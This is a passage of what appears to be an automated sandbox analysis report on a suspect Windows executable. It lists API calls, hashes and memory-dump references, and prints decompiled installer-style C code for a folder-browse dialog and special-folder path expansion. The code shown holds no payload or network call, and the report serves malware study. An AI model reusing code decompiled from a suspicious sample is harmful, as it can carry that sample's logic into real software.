                                                                                                • LoadBitmapA.USER32 ref: 0040469B
                                                                                                • SetWindowLongA.USER32 ref: 004046B5
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                                                                                                • DeleteObject.GDI32(?), ref: 00404715
                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                                                                                                • GetWindowLongA.USER32 ref: 0040484F
                                                                                                • SetWindowLongA.USER32 ref: 0040485D
                                                                                                • ShowWindow.USER32(?,00000005), ref: 0040486E
                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                                                                                                • GlobalFree.KERNEL32 ref: 00404A5A
                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                                                                                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404BF0
                                                                                                • GetDlgItem.USER32 ref: 00404BFB
                                                                                                • ShowWindow.USER32(00000000), ref: 00404C02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                                • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                                                                                • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                                • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040411B, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x6055b9
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x5ff628
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                                                                                0x00404121
                                                                                                0x00404128
                                                                                                0x00404134
                                                                                                0x00404142
                                                                                                0x0040414a
                                                                                                0x0040414e
                                                                                                0x00404154
                                                                                                0x00404154
                                                                                                0x00404160
                                                                                                0x004041d4
                                                                                                0x004041db
                                                                                                0x004042b0
                                                                                                0x004042b7
                                                                                                0x004042c6
                                                                                                0x004042c6
                                                                                                0x004042ca
                                                                                                0x004042d0
                                                                                                0x004042dd
                                                                                                0x004042df
                                                                                                0x004042df
                                                                                                0x004042ed
                                                                                                0x004042f2
                                                                                                0x004042f5
                                                                                                0x004042fc
                                                                                                0x004042ff
                                                                                                0x00404336
                                                                                                0x00404338
                                                                                                0x0040433e
                                                                                                0x00404345
                                                                                                0x00404347
                                                                                                0x00404347
                                                                                                0x00404363
                                                                                                0x0040439f
                                                                                                0x00000000
                                                                                                0x00404365
                                                                                                0x00404368
                                                                                                0x0040437c
                                                                                                0x0040437e
                                                                                                0x00000000
                                                                                                0x0040437e
                                                                                                0x00404301
                                                                                                0x00404305
                                                                                                0x00404334
                                                                                                0x00404334
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404307
                                                                                                0x00404307
                                                                                                0x00404314
                                                                                                0x00404319
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040431d
                                                                                                0x0040431f
                                                                                                0x0040431f
                                                                                                0x0040432a
                                                                                                0x0040432d
                                                                                                0x00404332
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404332
                                                                                                0x0040438d
                                                                                                0x00404394
                                                                                                0x0040439b
                                                                                                0x004043a2
                                                                                                0x004043a2
                                                                                                0x004043a7
                                                                                                0x004043a9
                                                                                                0x004043b1
                                                                                                0x004043b7
                                                                                                0x004043b7
                                                                                                0x004043be
                                                                                                0x004043c7
                                                                                                0x004043d1
                                                                                                0x004043d9
                                                                                                0x004043ef
                                                                                                0x004043db
                                                                                                0x004043df
                                                                                                0x004043df
                                                                                                0x004043d9
                                                                                                0x004043f4
                                                                                                0x004043f9
                                                                                                0x004043fe
                                                                                                0x00404407
                                                                                                0x00404407
                                                                                                0x00404410
                                                                                                0x00404412
                                                                                                0x00404412
                                                                                                0x0040441e
                                                                                                0x00404426
                                                                                                0x00404430
                                                                                                0x00404430
                                                                                                0x00404435
                                                                                                0x00000000
                                                                                                0x00404435
                                                                                                0x004042ff
                                                                                                0x004042b9
                                                                                                0x004042c0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004042c0
                                                                                                0x004041e1
                                                                                                0x004041e7
                                                                                                0x00404201
                                                                                                0x00404206
                                                                                                0x00404210
                                                                                                0x00404217
                                                                                                0x00404226
                                                                                                0x00404229
                                                                                                0x0040422c
                                                                                                0x00404233
                                                                                                0x0040423b
                                                                                                0x0040423e
                                                                                                0x00404242
                                                                                                0x00404249
                                                                                                0x00404251
                                                                                                0x004042a9
                                                                                                0x00404253
                                                                                                0x00404254
                                                                                                0x0040425b
                                                                                                0x00404260
                                                                                                0x00404265
                                                                                                0x0040426d
                                                                                                0x0040427a
                                                                                                0x0040428e
                                                                                                0x00404292
                                                                                                0x00404292
                                                                                                0x0040428e
                                                                                                0x00404297
                                                                                                0x004042a2
                                                                                                0x004042a2
                                                                                                0x00404251
                                                                                                0x00000000
                                                                                                0x00404206
                                                                                                0x004041f4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004041fa
                                                                                                0x00000000
                                                                                                0x00404162
                                                                                                0x00404162
                                                                                                0x0040416e
                                                                                                0x00404178
                                                                                                0x00404185
                                                                                                0x00404185
                                                                                                0x0040418b
                                                                                                0x00404194
                                                                                                0x0040419d
                                                                                                0x004041a0
                                                                                                0x004041a3
                                                                                                0x004041ab
                                                                                                0x004041ae
                                                                                                0x004041b1
                                                                                                0x004041b9
                                                                                                0x004041c0
                                                                                                0x004041c7
                                                                                                0x0040443b
                                                                                                0x0040444d
                                                                                                0x0040444d
                                                                                                0x004041d2
                                                                                                0x00000000
                                                                                                0x004041d2

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00404167
                                                                                                • SetWindowTextA.USER32(?,?), ref: 00404194
                                                                                                • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                                                                                • lstrcmpiA.KERNEL32(cegrwbhzuj,00429FD8,00000000,?,?), ref: 00404286
                                                                                                • lstrcatA.KERNEL32(?,cegrwbhzuj), ref: 00404292
                                                                                                • SetDlgItemTextA.USER32 ref: 004042A2
                                                                                                  • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                                                                                • SetDlgItemTextA.USER32 ref: 004043EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp$cegrwbhzuj
                                                                                                • API String ID: 2246997448-1579516440
                                                                                                • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                                • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                                                                                • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                                • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040594D, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 195stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x6055b9
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x603dec
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x73951340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}































                                                                                                0x0040594d
                                                                                                0x0040594d
                                                                                                0x0040594d
                                                                                                0x00405953
                                                                                                0x00405958
                                                                                                0x0040595a
                                                                                                0x00405969
                                                                                                0x00405969
                                                                                                0x0040596b
                                                                                                0x00405974
                                                                                                0x00405976
                                                                                                0x0040597b
                                                                                                0x0040597e
                                                                                                0x0040597f
                                                                                                0x00405986
                                                                                                0x00405988
                                                                                                0x0040598e
                                                                                                0x00405991
                                                                                                0x00405991
                                                                                                0x00405b66
                                                                                                0x00405b66
                                                                                                0x00405b6a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040599e
                                                                                                0x004059a4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004059aa
                                                                                                0x004059ab
                                                                                                0x004059ae
                                                                                                0x004059b1
                                                                                                0x00405b59
                                                                                                0x00405b63
                                                                                                0x00405b65
                                                                                                0x00405b65
                                                                                                0x00405b5b
                                                                                                0x00405b5d
                                                                                                0x00405b5f
                                                                                                0x00405b60
                                                                                                0x00405b60
                                                                                                0x00000000
                                                                                                0x00405b59
                                                                                                0x004059b7
                                                                                                0x004059bb
                                                                                                0x004059c0
                                                                                                0x004059cf
                                                                                                0x004059d2
                                                                                                0x004059d4
                                                                                                0x004059d9
                                                                                                0x004059dc
                                                                                                0x004059df
                                                                                                0x004059e2
                                                                                                0x004059e5
                                                                                                0x004059e8
                                                                                                0x00405b03
                                                                                                0x00405b06
                                                                                                0x00405b36
                                                                                                0x00405b39
                                                                                                0x00405b3e
                                                                                                0x00405b42
                                                                                                0x00405b42
                                                                                                0x00405b47
                                                                                                0x00405b48
                                                                                                0x00405b4d
                                                                                                0x00405b50
                                                                                                0x00405b52
                                                                                                0x00000000
                                                                                                0x00405b52
                                                                                                0x00405b08
                                                                                                0x00405b0b
                                                                                                0x00405b20
                                                                                                0x00405b27
                                                                                                0x00405b0d
                                                                                                0x00405b14
                                                                                                0x00405b14
                                                                                                0x00405b2f
                                                                                                0x00405b32
                                                                                                0x00405afb
                                                                                                0x00405afc
                                                                                                0x00405afc
                                                                                                0x00000000
                                                                                                0x00405b32
                                                                                                0x004059f0
                                                                                                0x004059f1
                                                                                                0x004059f7
                                                                                                0x004059f9
                                                                                                0x00405a13
                                                                                                0x00405a13
                                                                                                0x00405a1a
                                                                                                0x00405a1a
                                                                                                0x00405a21
                                                                                                0x00405a25
                                                                                                0x00405a25
                                                                                                0x00405a26
                                                                                                0x00405a28
                                                                                                0x00405a61
                                                                                                0x00405a64
                                                                                                0x00405a74
                                                                                                0x00405a77
                                                                                                0x00405a7f
                                                                                                0x00405a85
                                                                                                0x00405a85
                                                                                                0x00405ae1
                                                                                                0x00405ae1
                                                                                                0x00405ae3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a89
                                                                                                0x00405a90
                                                                                                0x00405a91
                                                                                                0x00405a93
                                                                                                0x00405aad
                                                                                                0x00405abb
                                                                                                0x00405ac1
                                                                                                0x00405ac3
                                                                                                0x00405ade
                                                                                                0x00405ade
                                                                                                0x00405ade
                                                                                                0x00000000
                                                                                                0x00405ade
                                                                                                0x00405ac9
                                                                                                0x00405ad4
                                                                                                0x00405ada
                                                                                                0x00405adc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405adc
                                                                                                0x00405a95
                                                                                                0x00405a98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405aa7
                                                                                                0x00405aa9
                                                                                                0x00405aab
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405aab
                                                                                                0x00000000
                                                                                                0x00405ae1
                                                                                                0x00405a6c
                                                                                                0x00000000
                                                                                                0x00405a2a
                                                                                                0x00405a2f
                                                                                                0x00405a45
                                                                                                0x00405a4a
                                                                                                0x00405a4d
                                                                                                0x00405aea
                                                                                                0x00405aea
                                                                                                0x00405aee
                                                                                                0x00405af6
                                                                                                0x00405af6
                                                                                                0x00000000
                                                                                                0x00405aee
                                                                                                0x00405a57
                                                                                                0x00405ae5
                                                                                                0x00405ae5
                                                                                                0x00405ae8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405ae8
                                                                                                0x00405a28
                                                                                                0x004059fb
                                                                                                0x004059ff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a01
                                                                                                0x00405a05
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00405a07
                                                                                                0x00405a0b
                                                                                                0x00000000
                                                                                                0x00405a0d
                                                                                                0x00405a0d
                                                                                                0x00000000
                                                                                                0x00405a0d
                                                                                                0x00405a0b
                                                                                                0x00405b70
                                                                                                0x00405b7a
                                                                                                0x00405b86
                                                                                                0x00405b86
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                                                                                • GetSystemDirectoryA.KERNEL32(cegrwbhzuj,00000400), ref: 00405A6C
                                                                                                • GetWindowsDirectoryA.KERNEL32(cegrwbhzuj,00000400), ref: 00405A7F
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0041B732), ref: 00405ABB
                                                                                                • SHGetPathFromIDListA.SHELL32(0041B732,cegrwbhzuj), ref: 00405AC9
                                                                                                • CoTaskMemFree.OLE32(0041B732), ref: 00405AD4
                                                                                                • lstrcatA.KERNEL32(cegrwbhzuj,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                                                                                • lstrlenA.KERNEL32(cegrwbhzuj,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$cegrwbhzuj$=`
                                                                                                • API String ID: 900638850-4272273129
                                                                                                • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                                • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                                                                                • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                                                                                • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                                                                                Uniqueness

